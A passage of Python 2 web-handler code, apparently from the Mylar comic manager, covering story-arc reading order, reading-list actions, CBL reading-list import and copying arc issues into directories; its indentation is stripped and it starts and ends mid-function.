oldreading_seq = None
logger.fdebug('[%s] Issue to renumber sequence from : %s' % (issuearcid, valid_readingorder))
reading_seq = 1
for rc in sorted(readchk, key=itemgetter('ReadingOrder'), reverse=False):
filename = None
if rc['Location'] is not None:
filename = ntpath.basename(rc['Location'])
if str(issuearcid) == str(rc['IssueArcID']):
logger.fdebug('new order sequence detected at #: %s' % valid_readingorder)
if valid_readingorder > int(rc['ReadingOrder']):
oldreading_seq = int(rc['ReadingOrder'])
else:
oldreading_seq = int(rc['ReadingOrder']) + 1
reading_seq = valid_readingorder
issueid = rc['IssueID']
IssueArcID = issuearcid
elif int(rc['ReadingOrder']) < valid_readingorder:
logger.fdebug('keeping issue sequence of order #: %s' % rc['ReadingOrder'])
reading_seq = int(rc['ReadingOrder'])
issueid = rc['IssueID']
IssueArcID = rc['IssueArcID']
elif int(rc['ReadingOrder']) >= valid_readingorder:
if oldreading_seq is not None:
if valid_readingorder <= len(readchk):
reading_seq = int(rc['ReadingOrder'])
#reading_seq = oldreading_seq
else:
#valid_readingorder
if valid_readingorder < old_reading_seq:
reading_seq = int(rc['ReadingOrder'])
else:
reading_seq = oldreading_seq +1
logger.fdebug('old sequence discovered at %s to %s' % (oldreading_seq, reading_seq))
oldreading_seq = None
elif int(rc['ReadingOrder']) == valid_readingorder:
reading_seq = valid_readingorder +1
else:
reading_seq +=1 #valid_readingorder + (int(rc['ReadingOrder']) - valid_readingorder) +1
issueid = rc['IssueID']
IssueArcID = rc['IssueArcID']
logger.fdebug('reordering existing sequence as lower sequence has changed. Altering from %s to %s' % (rc['ReadingOrder'], reading_seq))
new_readorder.append({'IssueArcID': IssueArcID,
'IssueID': issueid,
'ReadingOrder': reading_seq,
'filename': filename})
#we resequence in the following way:
# everything before the new reading number stays the same
# everything after the new reading order gets incremented
# add in the new reading order at the desired sequence
# check for empty spaces (missing numbers in sequence) and fill them in.
logger.fdebug('new reading order: %s' % new_readorder)
#newrl = 0
for rl in sorted(new_readorder, key=itemgetter('ReadingOrder'), reverse=False):
if rl['filename'] is not None:
try:
if int(rl['ReadingOrder']) != int(rl['filename'][:rl['filename'].find('-')]) and mylar.CONFIG.READ2FILENAME is True:
logger.fdebug('Order-Change: %s TO %s' % (int(rl['filename'][:rl['filename'].find('-')]), int(rl['ReadingOrder'])))
logger.fdebug('%s to %s' % (rl['filename'], helpers.renamefile_readingorder(rl['ReadingOrder']) + '-' + rl['filename'][rl['filename'].find('-')+1:]))
except:
pass
rl_ctrl = {"IssueID": rl['IssueID'],
"IssueArcID": rl['IssueArcID'],
"StoryArcID": storyarcid}
r1_new = {"ReadingOrder": rl['ReadingOrder']}
myDB.upsert("storyarcs", r1_new, rl_ctrl)
logger.info('Updated Issue Date for issue #' + str(issuenumber))
return value
order_edit.exposed = True
def manual_arc_add(self, manual_issueid, manual_readingorder, storyarcid, x=None, y=None):
logger.fdebug('IssueID to be attached : ' + str(manual_issueid))
logger.fdebug('StoryArcID : ' + str(storyarcid))
logger.fdebug('Reading Order # : ' + str(manual_readingorder))
threading.Thread(target=helpers.manualArc, args=[manual_issueid, manual_readingorder, storyarcid]).start()
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s" % storyarcid)
manual_arc_add.exposed = True
def markreads(self, action=None, **args):
sendtablet_queue = []
myDB = db.DBConnection()
for IssueID in args:
if IssueID is None or 'issue_table' in IssueID or 'issue_table_length' in IssueID:
continue
else:
mi = myDB.selectone("SELECT * FROM readlist WHERE IssueID=?", [IssueID]).fetchone()
if mi is None:
continue
else:
comicname = mi['ComicName']
if action == 'Downloaded':
logger.fdebug(u"Marking %s #%s as %s" % (comicname, mi['Issue_Number'], action))
read = readinglist.Readinglist(IssueID)
read.addtoreadlist()
elif action == 'Read':
logger.fdebug(u"Marking %s #%s as %s" % (comicname, mi['Issue_Number'], action))
markasRead(IssueID)
elif action == 'Added':
logger.fdebug(u"Marking %s #%s as %s" % (comicname, mi['Issue_Number'], action))
read = readinglist.Readinglist(IssueID=IssueID)
read.addtoreadlist()
elif action == 'Remove':
logger.fdebug('Deleting %s #%s' % (comicname, mi['Issue_Number']))
myDB.action('DELETE from readlist WHERE IssueID=?', [IssueID])
elif action == 'Send':
logger.fdebug('Queuing ' + mi['Location'] + ' to send to tablet.')
sendtablet_queue.append({"filepath": mi['Location'],
"issueid": IssueID,
"comicid": mi['ComicID']})
if len(sendtablet_queue) > 0:
read = readinglist.Readinglist(sendtablet_queue)
threading.Thread(target=read.syncreading).start()
markreads.exposed = True
def removefromreadlist(self, IssueID=None, StoryArcID=None, IssueArcID=None, AllRead=None, ArcName=None, delete_type=None, manual=None):
myDB = db.DBConnection()
if IssueID:
myDB.action('DELETE from readlist WHERE IssueID=?', [IssueID])
logger.info("[DELETE-READ-ISSUE] Removed " + str(IssueID) + " from Reading List")
elif StoryArcID:
logger.info('[DELETE-ARC] Removing ' + ArcName + ' from your Story Arc Watchlist')
myDB.action('DELETE from storyarcs WHERE StoryArcID=?', [StoryArcID])
#ArcName should be an optional flag so that it doesn't remove arcs that have identical naming (ie. Secret Wars)
if delete_type:
if ArcName:
logger.info('[DELETE-STRAGGLERS-OPTION] Removing all traces of arcs with the name of : ' + ArcName)
myDB.action('DELETE from storyarcs WHERE StoryArc=?', [ArcName])
else:
logger.warn('[DELETE-STRAGGLERS-OPTION] No ArcName provided - just deleting by Story Arc ID')
stid = 'S' + str(StoryArcID) + '_%'
#delete from the nzblog so it will always find the most current downloads. Nzblog has issueid, but starts with ArcID
myDB.action('DELETE from nzblog WHERE IssueID LIKE ?', [stid])
logger.info("[DELETE-ARC] Removed " + str(StoryArcID) + " from Story Arcs.")
elif IssueArcID:
if manual == 'added':
myDB.action('DELETE from storyarcs WHERE IssueArcID=?', [IssueArcID])
else:
myDB.upsert("storyarcs", {"Manual": 'deleted'}, {"IssueArcID": IssueArcID})
#myDB.action('DELETE from storyarcs WHERE IssueArcID=?', [IssueArcID])
logger.info("[DELETE-ARC] Removed " + str(IssueArcID) + " from the Story Arc.")
elif AllRead:
myDB.action("DELETE from readlist WHERE Status='Read'")
logger.info("[DELETE-ALL-READ] Removed All issues that have been marked as Read from Reading List")
removefromreadlist.exposed = True
def markasRead(self, IssueID=None, IssueArcID=None):
read = readinglist.Readinglist(IssueID, IssueArcID)
read.markasRead()
markasRead.exposed = True
def addtoreadlist(self, IssueID):
read = readinglist.Readinglist(IssueID=IssueID)
read.addtoreadlist()
return
#raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % readlist['ComicID'])
addtoreadlist.exposed = True
def importReadlist(self, filename):
from xml.dom.minidom import parseString, Element
import random
myDB = db.DBConnection()
file = open(filename)
data = file.read()
file.close()
dom = parseString(data)
# of results
storyarc = dom.getElementsByTagName('Name')[0].firstChild.wholeText
tracks = dom.getElementsByTagName('Book')
i = 1
node = dom.documentElement
logger.fdebug("there are " + str(len(tracks)) + " issues in the story-arc: " + str(storyarc))
#generate a random number for the ID, and tack on the total issue count to the end as a str :)
storyarcid = str(random.randint(1000, 9999)) + str(len(tracks))
i = 1
for book_element in tracks:
st_issueid = str(storyarcid) + "_" + str(random.randint(1000, 9999))
comicname = book_element.getAttribute('Series')
logger.fdebug("comic: " + comicname)
comicnumber = book_element.getAttribute('Number')
logger.fdebug("number: " + str(comicnumber))
comicvolume = book_element.getAttribute('Volume')
logger.fdebug("volume: " + str(comicvolume))
comicyear = book_element.getAttribute('Year')
logger.fdebug("year: " + str(comicyear))
CtrlVal = {"IssueArcID": st_issueid}
NewVals = {"StoryArcID": storyarcid,
"ComicName": comicname,
"IssueNumber": comicnumber,
"SeriesYear": comicvolume,
"IssueYear": comicyear,
"StoryArc": storyarc,
"ReadingOrder": i,
"TotalIssues": len(tracks)}
myDB.upsert("storyarcs", NewVals, CtrlVal)
i+=1
# Now we either load in all of the issue data for series' already on the watchlist,
# or we dynamically load them from CV and write to the db.
#this loads in all the series' that have multiple entries in the current story arc.
Arc_MultipleSeries = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND IssueID is NULL GROUP BY ComicName HAVING (COUNT(ComicName) > 1)", [storyarcid])
if Arc_MultipleSeries is None:
logger.info('Detected 0 series that have multiple entries in this Story Arc. Continuing.')
else:
AMS = []
for Arc_MS in Arc_MultipleSeries:
print Arc_MS
#the purpose of this loop is to loop through the multiple entries, pulling out the lowest & highest issue numbers
#along with the publication years in order to help the auto-detector attempt to figure out what the series is on CV.
#.schema storyarcs
#(StoryArcID TEXT, ComicName TEXT, IssueNumber TEXT, SeriesYear TEXT, IssueYEAR TEXT, StoryArc TEXT, TotalIssues TEXT,
# Status TEXT, inCacheDir TEXT, Location TEXT, IssueArcID TEXT, ReadingOrder INT, IssueID TEXT);
AMS.append({"StoryArcID": Arc_MS['StoryArcID'],
"ComicName": Arc_MS['ComicName'],
"SeriesYear": Arc_MS['SeriesYear'],
"IssueYear": Arc_MS['IssueYear'],
"IssueID": Arc_MS['IssueID'],
"highvalue": '0',
"lowvalue": '9999',
"yearRANGE": [str(Arc_MS['SeriesYear'])]}) #Arc_MS['SeriesYear']})
for MSCheck in AMS:
thischk = myDB.select('SELECT * FROM storyarcs WHERE ComicName=? AND SeriesYear=?', [MSCheck['ComicName'], MSCheck['SeriesYear']])
for tchk in thischk:
if helpers.issuedigits(tchk['IssueNumber']) > helpers.issuedigits(MSCheck['highvalue']):
for key in MSCheck.keys():
if key == "highvalue":
MSCheck[key] = tchk['IssueNumber']
if helpers.issuedigits(tchk['IssueNumber']) < helpers.issuedigits(MSCheck['lowvalue']):
for key in MSCheck.keys():
if key == "lowvalue":
MSCheck[key] = tchk['IssueNumber']
logger.fdebug(str(tchk['IssueYear']))
logger.fdebug(MSCheck['yearRANGE'])
if str(tchk['IssueYear']) not in str(MSCheck['yearRANGE']):
for key in MSCheck.keys():
if key == "yearRANGE":
MSCheck[key].append(str(tchk['IssueYear']))
#write out here
#logger.fdebug(str(MSCheck))
#now we load in the list without the multiple entries (ie. series that appear only once in the cbl and don't have an IssueID)
Arc_Issues = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND IssueID is NULL GROUP BY ComicName HAVING (COUNT(ComicName) = 1)", [storyarcid])
if Arc_Issues is None:
logger.fdebug('No individual series detected within the Reading list (series that only appear once).')
else:
logger.fdebug('Detected series that occur only once in the Reading List.')
for AI in Arc_Issues:
logger.fdebug('Detected ' + AI['ComicName'] + ' (' + AI['SeriesYear'] + ') #' + AI['IssueNumber'])
AMS.append({"StoryArcID": AI['StoryArcID'],
"ComicName": AI['ComicName'],
"SeriesYear": AI['SeriesYear'],
"IssueYear": AI['IssueYear'],
"IssueID": AI['IssueID'],
"highvalue": AI['IssueNumber'],
"lowvalue": AI['IssueNumber'],
"yearRANGE": AI['IssueYear']})
logger.fdebug('AMS:' + str(AMS))
logger.fdebug('I need to now try to populate ' + str(len(AMS)) + ' series.')
Arc_Data = []
for duh in AMS:
mode='series'
sresults = mb.findComic(duh['ComicName'], mode, issue=duh['highvalue'], limityear=duh['yearRANGE'])
type='comic'
if len(sresults) == 1:
sr = sresults[0]
logger.info('Only one result...automagik-mode enabled for ' + duh['ComicName'] + ' :: ' + str(sr['comicid']) + ' :: Publisher : ' + str(sr['publisher']))
issues = mylar.cv.getComic(sr['comicid'], 'issue')
isscnt = len(issues['issuechoice'])
logger.info('isscnt : ' + str(isscnt))
chklist = myDB.select('SELECT * FROM storyarcs WHERE StoryArcID=? AND ComicName=? AND SeriesYear=?', [duh['StoryArcID'], duh['ComicName'], duh['SeriesYear']])
if chklist is None:
logger.error('I did not find anything in the Story Arc. Something is probably wrong.')
continue
else:
n = 0
while (n <= isscnt):
try:
islval = issues['issuechoice'][n]
except IndexError:
break
for d in chklist:
if islval['Issue_Number'] == d['IssueNumber']:
logger.info('[' + str(islval['Issue_ID']) + '] matched on Issue Number for ' + duh['ComicName'] + ' #' + str(d['IssueNumber']))
logger.info('I should write these dates: ' + islval['Issue_Date'] + ' -- ' + islval['Store_Date'])
Arc_Data.append({"StoryArcID": duh['StoryArcID'],
"IssueArcID": d['IssueArcID'],
"ComicID": islval['Comic_ID'],
"IssueID": islval['Issue_ID'],
"Issue_Number": islval['Issue_Number'],
"Issue_Date": islval['Issue_Date'],
"Publisher": sr['publisher'],
"Store_Date": islval['Store_Date']})
break
n+=1
#the below cresults will auto-add and cycle through until all are added to watchlist
#cresults = importer.addComictoDB(sr['comicid'],"no",None)
else:
logger.fdebug('Returning results to screen - more than one possibility.')
resultset = 0
logger.info('I need to update ' + str(len(Arc_Data)) + ' issues in this Reading List with CV Issue Data.')
if len(Arc_Data) > 0:
for AD in Arc_Data:
newCtrl = {"IssueArcID": AD['IssueArcID']}
newVals = {"ComicID": AD['ComicID'],
"IssueID": AD['IssueID'],
"Publisher": AD['Publisher'],
"IssueDate": AD['Issue_Date'],
"ReleaseDate": AD['Store_Date']}
myDB.upsert("storyarcs", newVals, newCtrl)
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (storyarcid, storyarc))
importReadlist.exposed = True
def ArcWatchlist(self,StoryArcID=None):
myDB = db.DBConnection()
if StoryArcID:
ArcWatch = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=?", [StoryArcID])
else:
ArcWatch = myDB.select("SELECT * FROM storyarcs")
if ArcWatch is None:
logger.info("No Story Arcs to search")
else:
#cycle through the story arcs here for matches on the watchlist
arcname = ArcWatch[0]['StoryArc']
arcdir = helpers.filesafe(arcname)
arcpub = ArcWatch[0]['Publisher']
if arcpub is None:
arcpub = ArcWatch[0]['IssuePublisher']
lowyear = 9999
maxyear = 0
for la in ArcWatch:
if la['IssueDate'] is None:
continue
else:
if int(la['IssueDate'][:4]) > maxyear:
maxyear = int(la['IssueDate'][:4])
if int(la['IssueDate'][:4]) < lowyear:
lowyear = int(la['IssueDate'][:4])
if maxyear == 0:
spanyears = la['SeriesYear']
elif lowyear == maxyear:
spanyears = str(maxyear)
else:
spanyears = '%s - %s' % (lowyear, maxyear)
logger.info('arcpub: %s' % arcpub)
dstloc = helpers.arcformat(arcdir, spanyears, arcpub)
filelist = None
if dstloc is not None:
if not os.path.isdir(dstloc):
if mylar.CONFIG.STORYARCDIR:
logger.info('Story Arc Directory [%s] does not exist! - attempting to create now.' % dstloc)
else:
logger.info('Story Arc Grab-Bag Directory [%s] does not exist! - attempting to create now.' % dstloc)
checkdirectory = filechecker.validateAndCreateDirectory(dstloc, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
return
if all([mylar.CONFIG.CVINFO, mylar.CONFIG.STORYARCDIR]):
if not os.path.isfile(os.path.join(dstloc, "cvinfo")) or mylar.CONFIG.CV_ONETIMER:
logger.fdebug('Generating cvinfo file for story-arc.')
with open(os.path.join(dstloc, "cvinfo"), "w") as text_file:
if any([ArcWatch[0]['StoryArcID'] == ArcWatch[0]['CV_ArcID'], ArcWatch[0]['CV_ArcID'] is None]):
cvinfo_arcid = ArcWatch[0]['StoryArcID']
else:
cvinfo_arcid = ArcWatch[0]['CV_ArcID']
text_file.write('https://comicvine.gamespot.com/storyarc/4045-' + str(cvinfo_arcid))
if mylar.CONFIG.ENFORCE_PERMS:
filechecker.setperms(os.path.join(dstloc, 'cvinfo'))
#get the list of files within the storyarc directory, if any.
if mylar.CONFIG.STORYARCDIR:
fchk = filechecker.FileChecker(dir=dstloc, watchcomic=None, Publisher=None, sarc='true', justparse=True)
filechk = fchk.listFiles()
fccnt = filechk['comiccount']
logger.fdebug('[STORY ARC DIRECTORY] %s files exist within this directory.' % fccnt)
if fccnt > 0:
filelist = filechk['comiclist']
logger.info(filechk)
arc_match = []
wantedlist = []
sarc_title = None
showonreadlist = 1 # 0 won't show storyarcissues on storyarcs main page, 1 will show
for arc in ArcWatch:
newStatus = 'Skipped'
if arc['Manual'] == 'deleted':
continue
sarc_title = arc['StoryArc']
logger.fdebug('[%s] %s : %s' % (arc['StoryArc'], arc['ComicName'], arc['IssueNumber']))
matcheroso = "no"
#fc = filechecker.FileChecker(watchcomic=arc['ComicName'])
#modi_names = fc.dynamic_replace(arc['ComicName'])
#mod_arc = re.sub('[\|\s]', '', modi_names['mod_watchcomic'].lower()).strip() #is from the arc db
comics = myDB.select("SELECT * FROM comics WHERE DynamicComicName IN (?) COLLATE NOCASE", [arc['DynamicComicName']])
for comic in comics:
mod_watch = comic['DynamicComicName'] #is from the comics db
if re.sub('[\|\s]','', mod_watch.lower()).strip() == re.sub('[\|\s]', '', arc['DynamicComicName'].lower()).strip():
logger.fdebug("initial name match - confirming issue # is present in series")
if comic['ComicID'][:1] == 'G':
# if it's a multi-volume series, it's decimalized - let's get rid of the decimal.
GCDissue, whocares = helpers.decimal_issue(arc['IssueNumber'])
GCDissue = int(GCDissue) / 1000
if '.' not in str(GCDissue):
GCDissue = '%s.00' % GCDissue
logger.fdebug("issue converted to %s" % GCDissue)
isschk = myDB.selectone("SELECT * FROM issues WHERE Issue_Number=? AND ComicID=?", [str(GCDissue), comic['ComicID']]).fetchone()
else:
issue_int = helpers.issuedigits(arc['IssueNumber'])
logger.fdebug('int_issue = %s' % issue_int)
isschk = myDB.selectone("SELECT * FROM issues WHERE Int_IssueNumber=? AND ComicID=?", [issue_int, comic['ComicID']]).fetchone() #AND STATUS !='Snatched'", [issue_int, comic['ComicID']]).fetchone()
if isschk is None:
logger.fdebug('We matched on name, but issue %s doesn\'t exist for %s' % (arc['IssueNumber'], comic['ComicName']))
else:
#this gets ugly - if the name matches and the issue, it could still be wrong series
#use series year to break it down further.
logger.fdebug('COMIC-comicyear: %s' % comic['ComicYear'])
logger.fdebug('B4-ARC-seriesyear: %s' % arc['SeriesYear'])
if any([arc['SeriesYear'] is None, arc['SeriesYear'] == 'None']):
vy = '2099-00-00'
for x in isschk:
if any([x['IssueDate'] is None, x['IssueDate'] == '0000-00-00']):
sy = x['StoreDate']
if any([sy is None, sy == '0000-00-00']):
continue
else:
sy = x['IssueDate']
if sy < vy:
v_seriesyear = sy
seriesyear = v_seriesyear
logger.info('No Series year set. Discovered & set to %s' % seriesyear)
else:
seriesyear = arc['SeriesYear']
logger.fdebug('ARC-seriesyear: %s' % seriesyear)
if int(comic['ComicYear']) != int(seriesyear):
logger.fdebug('Series years are different - discarding match. %s != %s' % (comic['ComicYear'], seriesyear))
else:
logger.fdebug('issue #: %s is present!' % arc['IssueNumber'])
logger.fdebug('Comicname: %s' % arc['ComicName'])
logger.fdebug('ComicID: %s' % isschk['ComicID'])
logger.fdebug('Issue: %s' % arc['IssueNumber'])
logger.fdebug('IssueArcID: %s' % arc['IssueArcID'])
#gather the matches now.
arc_match.append({
"match_storyarc": arc['StoryArc'],
"match_name": arc['ComicName'],
"match_id": isschk['ComicID'],
"match_issue": arc['IssueNumber'],
"match_issuearcid": arc['IssueArcID'],
"match_seriesyear": comic['ComicYear'],
"match_readingorder": arc['ReadingOrder'],
"match_filedirectory": comic['ComicLocation'], #series directory path
"destination_location": dstloc}) #path to given storyarc / grab-bag directory
matcheroso = "yes"
break
if matcheroso == "no":
logger.fdebug('[NO WATCHLIST MATCH] Unable to find a match for %s :#%s' % (arc['ComicName'], arc['IssueNumber']))
wantedlist.append({
"ComicName": arc['ComicName'],
"IssueNumber": arc['IssueNumber'],
"IssueYear": arc['IssueYear']})
if filelist is not None and mylar.CONFIG.STORYARCDIR:
logger.fdebug('[NO WATCHLIST MATCH] Checking against local Arc directory for given issue.')
fn = 0
valids = [x for x in filelist if re.sub('[\|\s]','', x['dynamic_name'].lower()).strip() == re.sub('[\|\s]','', arc['DynamicComicName'].lower()).strip()]
logger.fdebug('valids: %s' % valids)
if len(valids) > 0:
for tmpfc in valids: #filelist:
haveissue = "no"
issuedupe = "no"
temploc = tmpfc['issue_number'].replace('_', ' ')
fcdigit = helpers.issuedigits(arc['IssueNumber'])
int_iss = helpers.issuedigits(temploc)
if int_iss == fcdigit:
logger.fdebug('%s Issue #%s already present in StoryArc directory' % (arc['ComicName'], arc['IssueNumber']))
#update storyarcs db to reflect status.
rr_rename = False
if mylar.CONFIG.READ2FILENAME:
readorder = helpers.renamefile_readingorder(arc['ReadingOrder'])
if all([tmpfc['reading_order'] is not None, int(readorder) != int(tmpfc['reading_order']['reading_sequence'])]):
logger.warn('reading order sequence has changed for this issue from %s to %s' % (tmpfc['reading_order']['reading_sequence'], readorder))
rr_rename = True
dfilename = '%s-%s' % (readorder, tmpfc['reading_order']['filename'])
elif tmpfc['reading_order'] is None:
dfilename = '%s-%s' % (readorder, tmpfc['comicfilename'])
else:
dfilename = '%s-%s' % (readorder, tmpfc['reading_order']['filename'])
else:
dfilename = tmpfc['comicfilename']
if all([tmpfc['sub'] is not None, tmpfc['sub'] != 'None']):
loc_path = os.path.join(tmpfc['comiclocation'], tmpfc['sub'], dfilename)
else:
loc_path = os.path.join(tmpfc['comiclocation'], dfilename)
if rr_rename:
logger.fdebug('Now re-sequencing file to : %s' % dfilename)
os.rename(os.path.join(tmpfc['comiclocation'],tmpfc['comicfilename']), loc_path)
newStatus = 'Downloaded'
newVal = {"Status": newStatus,
"Location": loc_path} #dfilename}
ctrlVal = {"IssueArcID": arc['IssueArcID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
break
else:
newStatus = 'Skipped'
fn+=1
if newStatus == 'Skipped':
#this will set all None Status' to Skipped (at least initially)
newVal = {"Status": "Skipped"}
ctrlVal = {"IssueArcID": arc['IssueArcID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
continue
newVal = {"Status": "Skipped"}
ctrlVal = {"IssueArcID": arc['IssueArcID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
logger.fdebug('%s issues currently exist on your watchlist that are within this arc. Analyzing...' % len(arc_match))
for m_arc in arc_match:
#now we cycle through the issues looking for a match.
#issue = myDB.selectone("SELECT * FROM issues where ComicID=? and Issue_Number=?", [m_arc['match_id'], m_arc['match_issue']]).fetchone()
issue = myDB.selectone("SELECT a.Issue_Number, a.Status, a.IssueID, a.ComicName, a.IssueDate, a.Location, b.readingorder FROM issues AS a INNER JOIN storyarcs AS b ON a.comicid = b.comicid where a.comicid=? and a.issue_number=?", [m_arc['match_id'], m_arc['match_issue']]).fetchone()
if issue is None: pass
else:
logger.fdebug('issue: %s ... %s' % (issue['Issue_Number'], m_arc['match_issue']))
if issue['Issue_Number'] == m_arc['match_issue']:
logger.fdebug('We matched on %s for %s' % (issue['Issue_Number'], m_arc['match_name']))
if issue['Status'] == 'Downloaded' or issue['Status'] == 'Archived' or issue['Status'] == 'Snatched':
if showonreadlist:
showctrlVal = {"IssueID": issue['IssueID']}
shownewVal = {"ComicName": issue['ComicName'],
"Issue_Number": issue['Issue_Number'],
"IssueDate": issue['IssueDate'],
"SeriesYear": m_arc['match_seriesyear'],
"ComicID": m_arc['match_id']}
myDB.upsert("readlist", shownewVal, showctrlVal)
logger.fdebug('Already have %s : #%s' % (issue['ComicName'], issue['Issue_Number']))
if issue['Location'] is not None:
issloc = os.path.join(m_arc['match_filedirectory'], issue['Location'])
else:
issloc = None
location_path = issloc
if issue['Status'] == 'Downloaded':
#check multiple destination directory usage here.
if not os.path.isfile(issloc):
try:
if all([mylar.CONFIG.MULTIPLE_DEST_DIRS is not None, mylar.CONFIG.MULTIPLE_DEST_DIRS != 'None', os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(m_arc['match_filedirectory'])) != issloc, os.path.exists(os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(m_arc['match_filedirectory'])))]):
issloc = os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(m_arc['match_filedirectory']), issue['Location'])
if not os.path.isfile(issloc):
logger.warn('Source file cannot be located. Please do a Recheck for the specific series to ensure everything is correct.')
continue
except:
pass
logger.fdebug('source location set to : %s' % issloc)
if all([mylar.CONFIG.STORYARCDIR, mylar.CONFIG.COPY2ARCDIR]):
logger.fdebug('Destination location set to : %s' % m_arc['destination_location'])
logger.fdebug('Attempting to copy into StoryArc directory')
#copy into StoryArc directory...
#need to make sure the file being copied over isn't already present in the directory either with a different filename,
#or different reading order.
rr_rename = False
if mylar.CONFIG.READ2FILENAME:
readorder = helpers.renamefile_readingorder(m_arc['match_readingorder'])
if all([m_arc['match_readingorder'] is not None, int(readorder) != int(m_arc['match_readingorder'])]):
logger.warn('Reading order sequence has changed for this issue from %s to %s' % (m_arc['match_reading_order'], readorder))
rr_rename = True
dfilename = '%s-%s' % (readorder, issue['Location'])
elif m_arc['match_readingorder'] is None:
dfilename = '%s-%s' % (readorder, issue['Location'])
else:
dfilename = '%s-%s' % (readorder, issue['Location'])
else:
dfilename = issue['Location']
#dfilename = str(readorder) + "-" + issue['Location']
#else:
#dfilename = issue['Location']
dstloc = os.path.join(m_arc['destination_location'], dfilename)
if rr_rename:
logger.fdebug('Now re-sequencing COPIED file to : %s' % dfilename)
os.rename(issloc, dstloc)
if not os.path.isfile(dstloc):
logger.fdebug('Copying %s to %s' % (issloc, dstloc))
try:
fileoperation = helpers.file_ops(issloc, dstloc, arc=True)
if not fileoperation:
raise OSError
except (OSError, IOError):
logger.error('Failed to %s %s - check directories and manually re-run.' % (mylar.CONFIG.FILE_OPTS, issloc))
continue
else:
logger.fdebug('Destination file exists: %s' % dstloc)
location_path = dstloc
else:
location_path = issloc
ctrlVal = {"IssueArcID": m_arc['match_issuearcid']}
newVal = {'Status': issue['Status'],
'IssueID': issue['IssueID'],
'Location': location_path}
myDB.upsert("storyarcs",newVal,ctrlVal)
else:
logger.fdebug('We don\'t have %s : #%s' % (issue['ComicName'], issue['Issue_Number']))
ctrlVal = {"IssueArcID": m_arc['match_issuearcid']}
newVal = {"Status": issue['Status'], #"Wanted",
"IssueID": issue['IssueID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
logger.info('Marked %s :#%s as %s' % (issue['ComicName'], issue['Issue_Number'], issue['Status']))
arcstats = self.storyarc_main(StoryArcID)
logger.info('[STORY-ARCS] Completed Missing/Recheck Files for %s [%s / %s]' % (arcname, arcstats['Have'], arcstats['TotalIssues']))
return
ArcWatchlist.exposed = True
def SearchArcIssues(self, **kwargs):
threading.Thread(target=self.ReadGetWanted, kwargs=kwargs).start()
SearchArcIssues.exposed = True
def ReadGetWanted(self, StoryArcID):
# this will queue up (ie. make 'Wanted') issues in a given Story Arc that are 'Not Watched'
stupdate = []
mode = 'story_arc'
myDB = db.DBConnection()
wantedlist = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND Status != 'Downloaded' AND Status !='Archived' AND Status !='Snatched'", [StoryArcID])
if wantedlist is not None:
for want in wantedlist:
print want
issuechk = myDB.selectone("SELECT a.Type, a.ComicYear, b.ComicName, b.Issue_Number, b.ComicID, b.IssueID FROM comics as a INNER JOIN issues as b on a.ComicID = b.ComicID WHERE b.IssueID=?", [want['IssueArcID']]).fetchone()
SARC = want['StoryArc']
IssueArcID = want['IssueArcID']
Publisher = want['Publisher']
if issuechk is None:
# none means it's not a 'watched' series
s_comicid = want['ComicID'] #None
s_issueid = want['IssueArcID'] #None
BookType = want['Type']
stdate = want['ReleaseDate']
issdate = want['IssueDate']
logger.fdebug("-- NOT a watched series queue.")
logger.fdebug('%s -- #%s' % (want['ComicName'], want['IssueNumber']))
logger.fdebug('Story Arc %s : queueing the selected issue...' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
logger.fdebug('ComicID: %s --- IssueID: %s' % (s_comicid, s_issueid)) # no comicid in issues table.
logger.fdebug('ReleaseDate: %s --- IssueDate: %s' % (stdate, issdate))
issueyear = want['IssueYEAR']
logger.fdebug('IssueYear: %s' % issueyear)
if issueyear is None or issueyear == 'None':
try:
logger.fdebug('issdate:' + str(issdate))
issueyear = issdate[:4]
if not issueyear.startswith('19') and not issueyear.startswith('20'):
issueyear = stdate[:4]
except:
issueyear = stdate[:4]
logger.fdebug('ComicYear: %s' % want['SeriesYear'])
passinfo = {'issueid': s_issueid,
'comicname': want['ComicName'],
'seriesyear': want['SeriesYear'],
'comicid': s_comicid,
'issuenumber': want['IssueNumber'],
'booktype': BookType}
#oneoff = True ?
else:
# it's a watched series
s_comicid = issuechk['ComicID']
s_issueid = issuechk['IssueID']
logger.fdebug("-- watched series queue.")
logger.fdebug('%s --- #%s' % (issuechk['ComicName'], issuechk['Issue_Number']))
passinfo = {'issueid': s_issueid,
'comicname': issuechk['ComicName'],
'seriesyear': issuechk['SeriesYear'],
'comicid': s_comicid,
'issuenumber': issuechk['Issue_Number'],
'booktype': issuechk['Type']}
mylar.SEARCH_QUEUE.put(passinfo)
#if foundcom['status'] is True:
# logger.fdebug('sucessfully found.')
# #update the status - this is necessary for torrents as they are in 'snatched' status.
# updater.foundsearch(s_comicid, s_issueid, mode=mode, provider=prov, SARC=SARC, IssueArcID=IssueArcID)
#else:
# logger.fdebug('not sucessfully found.')
# stupdate.append({"Status": "Wanted",
# "IssueArcID": IssueArcID,
# "IssueID": s_issueid})
watchlistchk = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND Status='Wanted'", [StoryArcID])
if watchlistchk is not None:
for watchchk in watchlistchk:
logger.fdebug('Watchlist hit - %s' % watchchk['ComicName'])
issuechk = myDB.selectone("SELECT a.Type, a.ComicYear, b.ComicName, b.Issue_Number, b.ComicID, b.IssueID FROM comics as a INNER JOIN issues as b on a.ComicID = b.ComicID WHERE b.IssueID=?", [watchchk['IssueArcID']]).fetchone()
SARC = watchchk['StoryArc']
IssueArcID = watchchk['IssueArcID']
if issuechk is None:
# none means it's not a 'watched' series
try:
s_comicid = watchchk['ComicID']
except:
s_comicid = None
try:
s_issueid = watchchk['IssueArcID']
except:
s_issueid = None
